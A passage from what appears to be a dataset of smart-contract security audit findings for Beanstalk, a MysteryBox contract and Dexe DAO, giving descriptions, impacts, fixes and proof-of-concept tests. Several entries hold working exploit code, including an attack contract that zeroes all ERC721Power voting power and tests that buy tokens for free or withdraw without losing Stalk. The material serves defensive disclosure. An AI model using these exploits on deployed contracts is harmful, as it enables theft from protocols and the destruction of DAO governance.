Otherwise, there will be a mismatch in decimals when calculating the stem tip.\\n```\\n_stemTipForToken = s.ss[token].milestoneStem +\\n int96(s.ss[token].stalkEarnedPerSeason).mul(\\n int96(s.season.current).sub(int96(s.ss[token].milestoneSeason))\\n );\\n```\\n",Scale up the existing milestone stem for each token:\\n```\\nfor (uint i = 0; i < siloTokens.length; i// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n s.ss[siloTokens[i]].milestoneStem = int96(s.ss[siloTokens[i]].milestoneStem.mul(1e6));\\n```\\n\\n\\clearpage,"The mixing of decimals between the old milestone stem (truncated) and the new milestone stem (untruncated, after the first `gm` call following the BIP-39 upgrade) breaks the existing grown stalk accounting, resulting in a loss of grown stalk for depositors.\\nProof of Concept: The previous implementation returns the cumulative stalk per BDV with 4 decimals:\\n```\\n function stemTipForToken(address token)\\n internal\\n view\\n returns (int96 _stemTipForToken)\\n {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n\\n // SafeCast unnecessary because all casted variables are types smaller that int96.\\n _stemTipForToken = s.ss[token].milestoneStem +\\n int96(s.ss[token].stalkEarnedPerSeason).mul(\\n int96(s.season.current).sub(int96(s.ss[token].milestoneSeason))\\n ).div(1e6); //round here\\n }\\n```\\n\\nWhich can be mathematically abstracted to: $$StemTip(token) = getMilestonStem(token) + (current \\ season - getMilestonStemSeason(token)) \\times \\frac{stalkEarnedPerSeason(token)}{10^{6}}$$\\nThis division by $10^{6}$ happens because the stem tip previously had just 4 decimals. This division allows backward compatibility by not considering the final 6 decimals. Therefore, the stem tip MUST ALWAYS have 4 decimals.\\nThe milestone stem is now updated in each `gm` call so long as all LP price oracles pass their respective checks. 
Notably, the milestone stem is now stored with 10 decimals (untruncated), hence why the second term of the abstraction has omited the `10^{6}` division in `LibTokenSilo::stemTipForTokenUntruncated`.\\nHowever, if the existing milestone stem is not escalated by $10^{6}$ then the addition performed during the upgrade and in subsequent `gm` calls makes no sense. This is mandatory to be handled within the upgrade otherwise every part of the protocol which calls `LibTokenSilo.stemTipForToken` will receive an incorrect value, except for BEAN:ETH Well LP (given it was created after the Silo v3 upgrade).\\nSome instances where this function is used include:\\n`EnrootFacet::enrootDeposit`\\n`EnrootFacet::enrootDeposits`\\n`MetaFacet::uri`\\n`ConvertFacet::_withdrawTokens`\\n`LibSilo::__mow`\\n`LibSilo::_removeDepositFromAccount`\\n`LibSilo::_removeDepositsFromAccount`\\n`Silo::_plant`\\n`TokenSilo::_deposit`\\n`TokenSilo::_transferDeposits`\\n`LibLegacyTokenSilo::_mowAndMigrate`\\n`LibTokenSilo::_mowAndMigrate`\\nAs can be observed, critical parts of the protocol are compromised, leading to further cascading issues.",```\\n_stemTipForToken = s.ss[token].milestoneStem +\\n int96(s.ss[token].stalkEarnedPerSeason).mul(\\n int96(s.season.current).sub(int96(s.ss[token].milestoneSeason))\\n );\\n```\\n +Both reserves should be checked in `LibWell::getWellPriceFromTwaReserves`,low,"```\\nfunction getWellPriceFromTwaReserves(address well) internal view returns (uint256 price) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n // s.twaReserve[well] should be set prior to this function being called.\\n // 'price' is in terms of reserve0:reserve1.\\n if (s.twaReserves[well].reserve0 == 0) {\\n price = 0;\\n } else {\\n price = s.twaReserves[well].reserve0.mul(1e18).div(s.twaReserves[well].reserve1);\\n }\\n}\\n```\\n\\nCurrently, `LibWell::getWellPriceFromTwaReserves` sets the price to zero if the time-weighted average reserves of the zeroth reserve (for Wells, Bean) is 
zero. Given the implementation of `LibWell::setTwaReservesForWell`, and that a Pump failure will return an empty reserves array, it does not appear possible to encounter the case where one reserve can be zero without the other except for perhaps an exploit or migration scenario. Therefore, whilst unlikely, it is best to ensure both reserves are non-zero to avoid a potential division by zero `reserve1` when calculating the price as a revert here would result in DoS of `SeasonFacet::gm`.\\n```\\nfunction setTwaReservesForWell(address well, uint256[] memory twaReserves) internal {\\n    AppStorage storage s = LibAppStorage.diamondStorage();\\n    // if the length of twaReserves is 0, then return 0.\\n    // the length of twaReserves should never be 1, but\\n    // is added for safety.\\n    if (twaReserves.length < 1) {\\n        delete s.twaReserves[well].reserve0;\\n        delete s.twaReserves[well].reserve1;\\n    } else {\\n        // safeCast not needed as the reserves are uint128 in the wells.\\n        s.twaReserves[well].reserve0 = uint128(twaReserves[0]);\\n        s.twaReserves[well].reserve1 = uint128(twaReserves[1]);\\n    }\\n}\\n```\\n\\nAdditionally, to correctly implement the check identified by the comment in `LibWell::setTwaReservesForWell`, the time-weighted average reserves in storage should be reset if the array length is less-than or equal-to 1.",```\\n// LibWell::getWellPriceFromTwaReserves`\\n// Remove the line below\\n if (s.twaReserves[well].reserve0 == 0) {\\n// Add the line below\\n if (s.twaReserves[well].reserve0 == 0 || s.twaReserves[well].reserve1 == 0) {\\n price = 0;\\n} else {\\n\\n// LibWell::setTwaReservesForWell\\n// Remove the line below\\n if (twaReserves.length < 1) {\\n// Add the line below\\n if (twaReserves.length <= 1) {\\n delete s.twaReserves[well].reserve0;\\n delete s.twaReserves[well].reserve1;\\n} else {\\n```\\n,,```\\nfunction getWellPriceFromTwaReserves(address well) internal view returns (uint256 price) {\\n AppStorage storage s = 
LibAppStorage.diamondStorage();\\n // s.twaReserve[well] should be set prior to this function being called.\\n // 'price' is in terms of reserve0:reserve1.\\n if (s.twaReserves[well].reserve0 == 0) {\\n price = 0;\\n } else {\\n price = s.twaReserves[well].reserve0.mul(1e18).div(s.twaReserves[well].reserve1);\\n }\\n}\\n```\\n +Small unripe token withdrawals don't decrease BDV and Stalk,low,"For any whitelisted token where `bdvCalc(amountDeposited) < amountDeposited`, a user can deposit that token and then withdraw in small amounts to avoid decreasing BDV and Stalk. This is achieved by exploiting a rounding down to zero precision loss in LibTokenSilo::removeDepositFromAccount:\\n```\\n// @audit small unripe bean withdrawals don't decrease BDV and Stalk\\n// due to rounding down to zero precision loss. Every token where\\n// `bdvCalc(amountDeposited) < amountDeposited` is vulnerable\\nuint256 removedBDV = amount.mul(crateBDV).div(crateAmount);\\n```\\n","`LibTokenSilo::removeDepositFromAccount` should revert if `removedBDV == 0`. A similar check already exists in `LibTokenSilo::depositWithBDV` but is missing in `removeDepositFromAccount()` when calculating `removedBDV` for partial withdrawals.\\nThe breaking of protocol invariants could lead to other serious issues that have not yet been identified but may well exist if core properties do not hold. We would urge the team to consider fixing this bug as soon as possible, prior to or as part of the BIP-39 upgrade.","An attacker can withdraw deposited assets without decreasing BDV and Stalk. 
While the cost to perform this attack is likely more than the value an attacker would stand to gain, the potential impact should definitely be explored more closely especially considering the introduction of the Unripe Chop Convert in BIP-39 as this could have other unintended consequences in relation to this bug (given that the inflated BDV of an Unripe Token will persist once deposit is converted to its ripe counterpart, potentially allowing value to be extracted that way depending on how this BDV is used/manipulated elsewhere).\\nThe other primary consideration for this bug is that it breaks the mechanism that Stalk is supposed to be lost when withdrawing deposited assets and keeps the `totalDepositedBdv` artificially high, violating the invariant that the `totalDepositedBdv` value for a token should be the sum of the BDV value of all the individual deposits.\\nProof of Concept: Add this PoC to `SiloToken.test.js` under the section describe(""1 deposit, some"", async function () {:\\n```\\nit('audit small unripe bean withdrawals dont decrease BDV and Stalks', async function () {\\n let initialUnripeBeanDeposited = to6('10');\\n let initialUnripeBeanDepositedBdv = '2355646';\\n let initialTotalStalk = pruneToStalk(initialUnripeBeanDeposited).add(toStalk('0.5'));\\n\\n // verify initial state\\n expect(await this.silo.getTotalDeposited(UNRIPE_BEAN)).to.eq(initialUnripeBeanDeposited);\\n expect(await this.silo.getTotalDepositedBdv(UNRIPE_BEAN)).to.eq(initialUnripeBeanDepositedBdv);\\n expect(await this.silo.totalStalk()).to.eq(initialTotalStalk);\\n\\n // snapshot EVM state as we want to restore it after testing the normal\\n // case works as expected\\n let snapshotId = await network.provider.send('evm_snapshot');\\n\\n // normal case: withdrawing total UNRIPE_BEAN correctly decreases BDV & removes stalks\\n const stem = await this.silo.seasonToStem(UNRIPE_BEAN, '10');\\n await this.silo.connect(user).withdrawDeposit(UNRIPE_BEAN, stem, initialUnripeBeanDeposited, 
EXTERNAL);\\n\\n // verify UNRIPE_BEAN totalDeposited == 0\\n expect(await this.silo.getTotalDeposited(UNRIPE_BEAN)).to.eq('0');\\n // verify UNRIPE_BEAN totalDepositedBDV == 0\\n expect(await this.silo.getTotalDepositedBdv(UNRIPE_BEAN)).to.eq('0');\\n // verify silo.totalStalk() == 0\\n expect(await this.silo.totalStalk()).to.eq('0');\\n\\n // restore EVM state to snapshot prior to testing normal case\\n await network.provider.send(""evm_revert"", [snapshotId]);\\n\\n // re-verify initial state\\n expect(await this.silo.getTotalDeposited(UNRIPE_BEAN)).to.eq(initialUnripeBeanDeposited);\\n expect(await this.silo.getTotalDepositedBdv(UNRIPE_BEAN)).to.eq(initialUnripeBeanDepositedBdv);\\n expect(await this.silo.totalStalk()).to.eq(initialTotalStalk);\\n\\n // attacker case: withdrawing small amounts of UNRIPE_BEAN doesn't decrease\\n // BDV and doesn't remove stalks. This lets an attacker withdraw their deposits\\n // without losing Stalks & breaks the invariant that the totalDepositedBDV should\\n // equal the sum of the BDV of all individual deposits\\n let smallWithdrawAmount = '4';\\n await this.silo.connect(user).withdrawDeposit(UNRIPE_BEAN, stem, smallWithdrawAmount, EXTERNAL);\\n\\n // verify UNRIPE_BEAN totalDeposited has been correctly decreased\\n expect(await this.silo.getTotalDeposited(UNRIPE_BEAN)).to.eq(initialUnripeBeanDeposited.sub(smallWithdrawAmount));\\n // verify UNRIPE_BEAN totalDepositedBDV remains unchanged!\\n expect(await this.silo.getTotalDepositedBdv(UNRIPE_BEAN)).to.eq(initialUnripeBeanDepositedBdv);\\n // verify silo.totalStalk() remains unchanged!\\n expect(await this.silo.totalStalk()).to.eq(initialTotalStalk);\\n});\\n```\\n\\nRun with: `npx hardhat test --grep ""audit small unripe bean withdrawals dont decrease BDV and Stalks""`.\\nAdditional Mainnet fork tests have been written to demonstrate the presence of this bug in the current and post-BIP-39 deployments of Beanstalk (see Appendix B).",```\\n// @audit small unripe bean 
withdrawals don't decrease BDV and Stalk\\n// due to rounding down to zero precision loss. Every token where\\n// `bdvCalc(amountDeposited) < amountDeposited` is vulnerable\\nuint256 removedBDV = amount.mul(crateBDV).div(crateAmount);\\n```\\n +Broken check in `MysteryBox::fulfillRandomWords()` fails to prevent same request being fulfilled multiple times,high,Consider the check which attempts to prevent the same request from being fulfilled multiple times:\\n```\\nif (vrfRequests[_requestId].fulfilled) revert InvalidVrfState();\\n```\\n\\nThe problem is that `vrfRequests[_requestId].fulfilled` is never set to `true` anywhere and `vrfRequests[_requestId]` is deleted at the end of the function.,Set `vrfRequests[_requestId].fulfilled = true`.\\nConsider an optimized version which involves having 2 mappings `activeVrfRequests` and fulfilledVrfRequests:\\nrevert `if(fulfilledVrfRequests[_requestId])`\\nelse set `fulfilledVrfRequests[_requestId] = true`\\nfetch the matching active request into memory from `activeVrfRequests[_requestId]` and continue processing as normal\\nat the end `delete activeVrfRequests[_requestId]`\\nThis only stores forever the `requestId` : `bool` pair in `fulfilledVrfRequests`.\\nConsider a similar approach in `MysteryBox::fulfillBoxAmount()`.,The same request can be fulfilled multiple times which would override the previous randomly generated seed; a malicious provider who was also a mystery box minter could generate new randomness until they got a rare mystery box.,```\\nif (vrfRequests[_requestId].fulfilled) revert InvalidVrfState();\\n```\\n +Use low level `call()` to prevent gas griefing attacks when returned data not required,low,"Using `call()` when the returned data is not required unnecessarily exposes to gas griefing attacks from huge returned data payload. 
For example:\\n```\\n(bool sent, ) = address(operatorAddress).call{value: msg.value}("""");\\nif (!sent) revert Unauthorized();\\n```\\n\\nIs the same as writing:\\n```\\n(bool sent, bytes memory data) = address(operatorAddress).call{value: msg.value}("""");\\nif (!sent) revert Unauthorized();\\n```\\n\\nIn both cases the returned data will have to be copied into memory exposing the contract to gas griefing attacks, even though the returned data is not required at all.","Use a low-level call when the returned data is not required, eg:\\n```\\nbool sent;\\nassembly {\\n sent := call(gas(), receiver, amount, 0, 0, 0, 0)\\n}\\nif (!sent) revert Unauthorized();\\n```\\n\\nConsider using ExcessivelySafeCall.",Contracts unnecessarily expose themselves to gas griefing attacks.,"```\\n(bool sent, ) = address(operatorAddress).call{value: msg.value}("""");\\nif (!sent) revert Unauthorized();\\n```\\n" +`TokenSaleProposal::buy` implicitly assumes that buy token has 18 decimals resulting in a potential total loss scenario for Dao Pool,high,"`TokenSaleProposalBuy::buy` is called by users looking to buy the DAO token using a pre-approved token. The exchange rate for this sale is pre-assigned for the specific tier. This function internally calls `TokenSaleProposalBuy::_purchaseWithCommission` to transfer funds from the buyer to the gov pool. Part of the transferred funds are used to pay the DexeDAO commission and balance funds are transferred to the `GovPool` address. 
To do this, `TokenSaleProposalBuy::_sendFunds` is called.\\n```\\n function _sendFunds(address token, address to, uint256 amount) internal {\\n if (token == ETHEREUM_ADDRESS) {\\n (bool success, ) = to.call{value: amount}("""");\\n require(success, ""TSP: failed to transfer ether"");\\n } else {\\n IERC20(token).safeTransferFrom(msg.sender, to, amount.from18(token.decimals())); //@audit -> amount is assumed to be 18 decimals\\n }\\n }\\n```\\n\\nNote that this function assumes that the `amount` of ERC20 token is always 18 decimals. The `DecimalsConverter::from18` function converts from a base decimal (18) to token decimals. Note that the `amount` is directly passed by the buyer and there is no prior normalisation done to ensure the token decimals are converted to 18 decimals before the `_sendFunds` is called.","There are at least 2 options for mitigating this issue:\\nOption 1 - revise the design decision that all token amounts must be sent in 18 decimals even if the underlying token decimals are not 18, to instead that all token amounts should be sent in their native decimals and Dexe will convert everything.\\nOption 2 - keep current design but revert if `amount.from18(token.decimals()) == 0` in L90 or alternatively use the `from18Safe()` function which uses `_convertSafe()` that reverts if the conversion is 0.\\nThe project team should also examine other areas where the same pattern occurs which may have the same vulnerability and where it may be required to revert if the conversion returns 0:\\n`GovUserKeeper` L92, L116, L183\\n`GovPool` L248\\n`TokenSaleProposalWhitelist` L50\\n`ERC721Power` L113, L139\\n`TokenBalance` L35, L62","It is easy to see that for tokens with smaller decimals, eg. USDC with 6 decimals, will cause a total loss to the DAO. 
In such cases amount is presumed to be 18 decimals & on converting to token decimals(6), this number can round down to 0.\\nProof of Concept:\\nTier 1 allows users to buy DAO token at exchange rate, 1 DAO token = 1 USDC.\\nUser intends to buy 1000 Dao Tokens and calls `TokenSaleProposal::buy` with `buy(1, USDC, 1000*10**6)\\nDexe DAO Comission is assumed 0% for simplicity- > `sendFunds` is called with `sendFunds(USDC, govPool, 1000* 10**6)`\\n`DecimalConverter::from18` function is called on amount with base decimals 18, destination decimals 6: `from18(1000*10**6, 18, 6)`\\nthis gives `1000*10**6/10*(18-6) = 1000/ 10**6` which rounds to 0\\nBuyer can claim 1000 DAO tokens for free. This is a total loss to the DAO.\\nAdd PoC to TokenSaleProposal.test.js:\\nFirst add a new line around L76 to add new purchaseToken3:\\n```\\n let purchaseToken3;\\n```\\n\\nThen add a new line around L528:\\n```\\n purchaseToken3 = await ERC20Mock.new(""PurchaseMockedToken3"", ""PMT3"", 6);\\n```\\n\\nThen add a new tier around L712:\\n```\\n {\\n metadata: {\\n name: ""tier 9"",\\n description: ""the ninth tier"",\\n },\\n totalTokenProvided: wei(1000),\\n saleStartTime: timeNow.toString(),\\n saleEndTime: (timeNow + 10000).toString(),\\n claimLockDuration: ""0"",\\n saleTokenAddress: saleToken.address,\\n purchaseTokenAddresses: [purchaseToken3.address],\\n exchangeRates: [PRECISION.times(1).toFixed()],\\n minAllocationPerUser: 0,\\n maxAllocationPerUser: 0,\\n vestingSettings: {\\n vestingPercentage: ""0"",\\n vestingDuration: ""0"",\\n cliffPeriod: ""0"",\\n unlockStep: ""0"",\\n },\\n participationDetails: [],\\n },\\n```\\n\\nThen add the test itself under the section describe(""if added to whitelist"", () => {:\\n```\\n it(""audit buy implicitly assumes that buy token has 18 decimals resulting in loss to DAO"", async () => {\\n await purchaseToken3.approve(tsp.address, wei(1000));\\n\\n // tier9 has the following parameters:\\n // totalTokenProvided : wei(1000)\\n // 
minAllocationPerUser : 0 (no min)\\n // maxAllocationPerUser : 0 (no max)\\n // exchangeRate : 1 sale token for every 1 purchaseToken\\n //\\n // purchaseToken3 has 6 decimal places\\n //\\n // mint purchase tokens to owner 1000 in 6 decimal places\\n // 1000 000000\\n let buyerInitTokens6Dec = 1000000000;\\n\\n await purchaseToken3.mint(OWNER, buyerInitTokens6Dec);\\n await purchaseToken3.approve(tsp.address, buyerInitTokens6Dec, { from: OWNER });\\n\\n //\\n // start: buyer has bought no tokens\\n let TIER9 = 9;\\n let purchaseView = userViewsToObjects(await tsp.getUserViews(OWNER, [TIER9]))[0].purchaseView;\\n assert.equal(purchaseView.claimTotalAmount, wei(0));\\n\\n // buyer attempts to purchase using 100 purchaseToken3 tokens\\n // purchaseToken3 has 6 decimals but all inputs to Dexe should be in\\n // 18 decimals, so buyer formats input amount to 18 decimals\\n // doing this first to verify it works correctly\\n let buyInput18Dec = wei(""100"");\\n await tsp.buy(TIER9, purchaseToken3.address, buyInput18Dec);\\n\\n // buyer has bought wei(100) sale tokens\\n purchaseView = userViewsToObjects(await tsp.getUserViews(OWNER, [TIER9]))[0].purchaseView;\\n assert.equal(purchaseView.claimTotalAmount, buyInput18Dec);\\n\\n // buyer has 900 000000 remaining purchaseToken3 tokens\\n assert.equal((await purchaseToken3.balanceOf(OWNER)).toFixed(), ""900000000"");\\n\\n // next buyer attempts to purchase using 100 purchaseToken3 tokens\\n // but sends input formatted into native 6 decimals\\n // sends 6 decimal input: 100 000000\\n let buyInput6Dec = 100000000;\\n await tsp.buy(TIER9, purchaseToken3.address, buyInput6Dec);\\n\\n // buyer has bought an additional 100000000 sale tokens\\n purchaseView = userViewsToObjects(await tsp.getUserViews(OWNER, [TIER9]))[0].purchaseView;\\n assert.equal(purchaseView.claimTotalAmount, ""100000000000100000000"");\\n\\n // but the buyer still has 900 000000 remaining purchasetoken3 tokens\\n assert.equal((await 
purchaseToken3.balanceOf(OWNER)).toFixed(), ""900000000"");\\n\\n // by sending the input amount formatted to 6 decimal places,\\n // the buyer was able to buy small amounts of the token being sold\\n // for free!\\n });\\n```\\n\\nFinally run the test with: `npx hardhat test --grep ""audit buy implicitly assumes that buy token has 18 decimals resulting in loss to DAO""`","```\\n function _sendFunds(address token, address to, uint256 amount) internal {\\n if (token == ETHEREUM_ADDRESS) {\\n (bool success, ) = to.call{value: amount}("""");\\n require(success, ""TSP: failed to transfer ether"");\\n } else {\\n IERC20(token).safeTransferFrom(msg.sender, to, amount.from18(token.decimals())); //@audit -> amount is assumed to be 18 decimals\\n }\\n }\\n```\\n" +Attacker can destroy user voting power by setting `ERC721Power::totalPower` and all existing NFTs `currentPower` to 0,high,"Attacker can destroy user voting power by setting `ERC721Power::totalPower` & all existing nfts' `currentPower` to 0 via a permission-less attack contract by exploiting a discrepancy (""<"" vs ""<="") in `ERC721Power` L144 & L172:\\n```\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n // @audit execution allowed to continue when\\n // block.timestamp == powerCalcStartTimestamp\\n if (block.timestamp < powerCalcStartTimestamp) {\\n return 0;\\n }\\n // @audit getNftPower() returns 0 when\\n // block.timestamp == powerCalcStartTimestamp\\n newPower = getNftPower(tokenId);\\n\\n NftInfo storage nftInfo = nftInfos[tokenId];\\n\\n // @audit as this is the first update since power\\n // calculation has just started, totalPower will be\\n // subtracted by nft's max power\\n totalPower -= nftInfo.lastUpdate != 0 ? 
nftInfo.currentPower : getMaxPowerForNft(tokenId);\\n // @audit totalPower += 0 (newPower = 0 in above line)\\n totalPower += newPower;\\n\\n nftInfo.lastUpdate = uint64(block.timestamp);\\n // @audit will set nft's current power to 0\\n nftInfo.currentPower = newPower;\\n}\\n\\nfunction getNftPower(uint256 tokenId) public view override returns (uint256) {\\n // @audit execution always returns 0 when\\n // block.timestamp == powerCalcStartTimestamp\\n if (block.timestamp <= powerCalcStartTimestamp) {\\n return 0;\\n```\\n\\nThis attack has to be run on the exact block that power calculation starts (when block.timestamp == ERC721Power.powerCalcStartTimestamp).",Resolve the discrepancy between `ERC721Power` L144 & L172.,"`ERC721Power::totalPower` & all existing nft's `currentPower` are set 0, negating voting using `ERC721Power` since `totalPower` is read when creating the snapshot and `GovUserKeeper::getNftsPowerInTokensBySnapshot()` will return 0 same as if the nft contract didn't exist. Can also negatively affect the ability to create proposals.\\nThis attack is extremely devastating as the individual power of `ERC721Power` nfts can never be increased; it can only decrease over time if the required collateral is not deposited. 
By setting all nfts' `currentPower = 0` as soon as power calculation starts (block.timestamp == ERC721Power.powerCalcStartTimestamp) the `ERC721Power` contract is effectively completely bricked - there is no way to ""undo"" this attack unless the nft contract is replaced with a new contract.\\nDexe-DAO can be created using only nfts for voting; in this case this exploit which completely bricks the voting power of all nfts means a new DAO has to be re-deployed since no one can vote as everyone's voting power has been destroyed.\\nProof of Concept: Add attack contract mock/utils/ERC721PowerAttack.sol:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.4;\\n\\nimport ""../../gov/ERC721/ERC721Power.sol"";\\n\\nimport ""hardhat/console.sol"";\\n\\ncontract ERC721PowerAttack {\\n // this attack can decrease ERC721Power::totalPower by the the true max power of all\\n // the power nfts that exist (to zero), regardless of who owns them, and sets the current\\n // power of all nfts to zero, totally bricking the ERC721Power contract.\\n //\\n // this attack only works when block.timestamp == nftPower.powerCalcStartTimestamp\\n // as it takes advantage of a difference in getNftPower() & recalculateNftPower():\\n //\\n // getNftPower() returns 0 when block.timestamp <= powerCalcStartTimestamp\\n // recalculateNftPower returns 0 when block.timestamp < powerCalcStartTimestamp\\n function attack(\\n address nftPowerAddr,\\n uint256 initialTotalPower,\\n uint256 lastTokenId\\n ) external {\\n ERC721Power nftPower = ERC721Power(nftPowerAddr);\\n\\n // verify attack starts on the correct block\\n require(\\n block.timestamp == nftPower.powerCalcStartTimestamp(),\\n ""ERC721PowerAttack: attack requires block.timestamp == nftPower.powerCalcStartTimestamp""\\n );\\n\\n // verify totalPower() correct at starting block\\n require(\\n nftPower.totalPower() == initialTotalPower,\\n ""ERC721PowerAttack: incorrect initial totalPower""\\n );\\n\\n // call recalculateNftPower() for 
every nft, this:\\n // 1) decreases ERC721Power::totalPower by that nft's max power\\n // 2) sets that nft's currentPower = 0\\n for (uint256 i = 1; i <= lastTokenId; ) {\\n require(\\n nftPower.recalculateNftPower(i) == 0,\\n ""ERC721PowerAttack: recalculateNftPower() should return 0 for new nft power""\\n );\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n require(\\n nftPower.totalPower() == 0,\\n ""ERC721PowerAttack: after attack finished totalPower should equal 0""\\n );\\n }\\n}\\n```\\n\\nAdd test harness to ERC721Power.test.js:\\n```\\n describe(""audit attacker can manipulate ERC721Power totalPower"", () => {\\n it(""audit attack 1 sets ERC721Power totalPower & all nft currentPower to 0"", async () => {\\n // deploy the ERC721Power nft contract with:\\n // max power of each nft = 100\\n // power reduction 10%\\n // required collateral = 100\\n let maxPowerPerNft = toPercent(""100"");\\n let requiredCollateral = wei(""100"");\\n let powerCalcStartTime = (await getCurrentBlockTime()) + 1000;\\n // hack needed to start attack contract on exact block due to hardhat\\n // advancing block.timestamp in the background between function calls\\n let powerCalcStartTime2 = (await getCurrentBlockTime()) + 999;\\n\\n // create power nft contract\\n await deployNft(powerCalcStartTime, maxPowerPerNft, toPercent(""10""), requiredCollateral);\\n\\n // ERC721Power::totalPower should be zero as no nfts yet created\\n assert.equal((await nft.totalPower()).toFixed(), toPercent(""0"").times(1).toFixed());\\n\\n // create the attack contract\\n const ERC721PowerAttack = artifacts.require(""ERC721PowerAttack"");\\n let attackContract = await ERC721PowerAttack.new();\\n\\n // create 10 power nfts for SECOND\\n await nft.safeMint(SECOND, 1);\\n await nft.safeMint(SECOND, 2);\\n await nft.safeMint(SECOND, 3);\\n await nft.safeMint(SECOND, 4);\\n await nft.safeMint(SECOND, 5);\\n await nft.safeMint(SECOND, 6);\\n await nft.safeMint(SECOND, 7);\\n await nft.safeMint(SECOND, 8);\\n await 
nft.safeMint(SECOND, 9);\\n await nft.safeMint(SECOND, 10);\\n\\n // verify ERC721Power::totalPower has been increased by max power for all nfts\\n assert.equal((await nft.totalPower()).toFixed(), maxPowerPerNft.times(10).toFixed());\\n\\n // fast forward time to the start of power calculation\\n await setTime(powerCalcStartTime2);\\n\\n // launch the attack\\n await attackContract.attack(nft.address, maxPowerPerNft.times(10).toFixed(), 10);\\n });\\n });\\n```\\n\\nRun attack with: `npx hardhat test --grep ""audit attack 1 sets ERC721Power totalPower & all nft currentPower to 0""`","```\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n // @audit execution allowed to continue when\\n // block.timestamp == powerCalcStartTimestamp\\n if (block.timestamp < powerCalcStartTimestamp) {\\n return 0;\\n }\\n // @audit getNftPower() returns 0 when\\n // block.timestamp == powerCalcStartTimestamp\\n newPower = getNftPower(tokenId);\\n\\n NftInfo storage nftInfo = nftInfos[tokenId];\\n\\n // @audit as this is the first update since power\\n // calculation has just started, totalPower will be\\n // subtracted by nft's max power\\n totalPower -= nftInfo.lastUpdate != 0 ? nftInfo.currentPower : getMaxPowerForNft(tokenId);\\n // @audit totalPower += 0 (newPower = 0 in above line)\\n totalPower += newPower;\\n\\n nftInfo.lastUpdate = uint64(block.timestamp);\\n // @audit will set nft's current power to 0\\n nftInfo.currentPower = newPower;\\n}\\n\\nfunction getNftPower(uint256 tokenId) public view override returns (uint256) {\\n // @audit execution always returns 0 when\\n // block.timestamp == powerCalcStartTimestamp\\n if (block.timestamp <= powerCalcStartTimestamp) {\\n return 0;\\n```\\n" +A malicious DAO Pool can create a token sale tier without actually transferring any DAO tokens,high,"`TokenSaleProposalCreate::createTier` is called by a DAO Pool owner to create a new token sale tier. 
A fundamental prerequisite for creating a tier is that the DAO Pool owner must transfer the `totalTokenProvided` amount of DAO tokens to the `TokenSaleProposal`.\\nCurrent implementation implements a low-level call to transfer tokens from `msg.sender(GovPool)` to `TokenSaleProposal` contract. However, the implementation fails to validate the token balances after the transfer is successful. We notice a `dev` comment stating ""return value is not checked intentionally"" - even so, this vulnerability is not related to checking return `status` but to verifying the contract balances before & after the call.\\n```\\nfunction createTier(\\n mapping(uint256 => ITokenSaleProposal.Tier) storage tiers,\\n uint256 newTierId,\\n ITokenSaleProposal.TierInitParams memory _tierInitParams\\n ) external {\\n\\n // rest of code.\\n /// @dev return value is not checked intentionally\\n > tierInitParams.saleTokenAddress.call(\\n abi.encodeWithSelector(\\n IERC20.transferFrom.selector,\\n msg.sender,\\n address(this),\\n totalTokenProvided\\n )\\n ); //@audit -> no check if the contract balance has increased proportional to the totalTokenProvided\\n }\\n```\\n\\nSince a DAO Pool owner can use any ERC20 as a DAO token, it is possible for a malicious Gov Pool owner to implement a custom ERC20 implementation of a token that overrides the `transferFrom` function. This function can override the standard ERC20 `transferFrom` logic that fakes a successful transfer without actually transferring underlying tokens.","Calculate the contract balance before and after the low-level call and verify if the account balance increases by `totalTokenProvided`. Please be mindful that this check is only valid for non-fee-on-transfer tokens. For fee-on-transfer tokens, the balance increase needs to be further adjusted for the transfer fees. 
Example code for non-free-on-transfer-tokens:\\n```\\n // transfer sale tokens to TokenSaleProposal and validate the transfer\\n IERC20 saleToken = IERC20(_tierInitParams.saleTokenAddress);\\n\\n // record balance before transfer in 18 decimals\\n uint256 balanceBefore18 = saleToken.balanceOf(address(this)).to18(_tierInitParams.saleTokenAddress);\\n\\n // perform the transfer\\n saleToken.safeTransferFrom(\\n msg.sender,\\n address(this),\\n _tierInitParams.totalTokenProvided.from18Safe(_tierInitParams.saleTokenAddress)\\n );\\n\\n // record balance after the transfer in 18 decimals\\n uint256 balanceAfter18 = saleToken.balanceOf(address(this)).to18(_tierInitParams.saleTokenAddress);\\n\\n // verify that the transfer has actually occured to protect users from malicious\\n // sale tokens that don't actually send the tokens for the token sale\\n require(balanceAfter18 - balanceBefore18 == _tierInitParams.totalTokenProvided,\\n ""TSP: token sale proposal creation received incorrect amount of tokens""\\n );\\n```\\n","A fake tier can be created without the proportionate amount of DAO Pool token balance in the `TokenSaleProposal` contract. Naive users can participate in such a token sale assuming their DAO token claims will be honoured at a future date. 
Since the pool has insufficient token balance, any attempts to claim the DAO pool tokens can lead to a permanent DOS.","```\\nfunction createTier(\\n mapping(uint256 => ITokenSaleProposal.Tier) storage tiers,\\n uint256 newTierId,\\n ITokenSaleProposal.TierInitParams memory _tierInitParams\\n ) external {\\n\\n // rest of code.\\n /// @dev return value is not checked intentionally\\n > tierInitParams.saleTokenAddress.call(\\n abi.encodeWithSelector(\\n IERC20.transferFrom.selector,\\n msg.sender,\\n address(this),\\n totalTokenProvided\\n )\\n ); //@audit -> no check if the contract balance has increased proportional to the totalTokenProvided\\n }\\n```\\n" +Attacker can at anytime dramatically lower `ERC721Power::totalPower` close to 0,high,"Attacker can at anytime dramatically lower `ERC721Power::totalPower` close to 0 using a permission-less attack contract by taking advantage of being able to call `ERC721Power::recalculateNftPower()` & `getNftPower()` for non-existent nfts:\\n```\\nfunction getNftPower(uint256 tokenId) public view override returns (uint256) {\\n if (block.timestamp <= powerCalcStartTimestamp) {\\n return 0;\\n }\\n\\n // @audit 0 for non-existent tokenId\\n uint256 collateral = nftInfos[tokenId].currentCollateral;\\n\\n // Calculate the minimum possible power based on the collateral of the nft\\n // @audit returns default maxPower for non-existent tokenId\\n uint256 maxNftPower = getMaxPowerForNft(tokenId);\\n uint256 minNftPower = maxNftPower.ratio(collateral, getRequiredCollateralForNft(tokenId));\\n minNftPower = maxNftPower.min(minNftPower);\\n\\n // Get last update and current power. 
